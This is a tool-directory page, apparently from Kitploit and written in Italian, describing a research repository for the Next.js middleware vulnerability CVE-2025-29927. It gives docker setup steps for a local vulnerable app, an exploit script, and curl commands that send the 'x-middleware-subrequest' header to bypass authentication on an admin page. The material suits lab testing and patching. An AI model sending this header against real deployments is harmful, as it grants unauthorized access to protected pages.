Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
nextjs-middleware-exploit — Ricerca sulla vulnerabilità del middleware di Next.js (CVE-2025-29927) che consente il bypass dell'autorizzazione e potenziali exploit. | Kitploit
Strumenti/GitHubGitHub/l1uk/nextjs-middleware-exploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneApprendimento e Formazione
GitHubl1uk/nextjs-middleware-exploit

nextjs-middleware-exploit

Ricerca sulla vulnerabilità del middleware di Next.js (CVE-2025-29927) che consente il bypass dell'autorizzazione e potenziali exploit.

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Ricerca sulla vulnerabilità del middleware Next.js (CVE-2025-29927)

Questo repository dimostra una vulnerabilità critica nel middleware di Next.js (CVE-2025-29927), che interessa le versioni dalla 11.1.4 alla 15.1.7. Questa vulnerabilità consente bypass dell'autorizzazione, bypass della CSP e potenziali attacchi DoS tramite cache-poisoning. Il problema ha origine nel modo in cui viene gestita l'header x-middleware-subrequest, consentendo agli attaccanti di aggirare i meccanismi di protezione del middleware.

Questa prova di concetto è specifica per la vulnerabilità in v12

Utilizzo

Configurazione dell'ambiente

Configura l'ambiente vulnerabile usando docker e i file di questo repository eseguendo:

root@kitploit:~
git clone https://github.com/l1uk/nextjs-middleware-exploit.git
cd nextjs-middleware-exploit
docker build -t my-next-app .
docker run -p 3000:3000 my-next-app

Exploit

Questo repository contiene lo script exploit.sh già creato per testare lo sfruttamento della vulnerabilità. Per testarlo esegui:

root@kitploit:~
chmod +x exploit.sh
./exploit.sh

Inoltre puoi testare lo sfruttamento della vulnerabilità provando quanto segue:

  1. Richiedi la pagina admin senza autenticazione. Dovresti ricevere un reindirizzamento alla pagina login.
root@kitploit:~
curl -i http://localhost:3000/admin
  1. Richiedi la pagina senza autenticazione ma usando l'header x-middleware-subrequest. Dovresti riuscire a bypassare la pagina di autenticazione.
root@kitploit:~
curl -i -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/admin

Avviso di sicurezza

  • CVE-2025-29927: Link all'avviso di sicurezza
Scarica lo strumento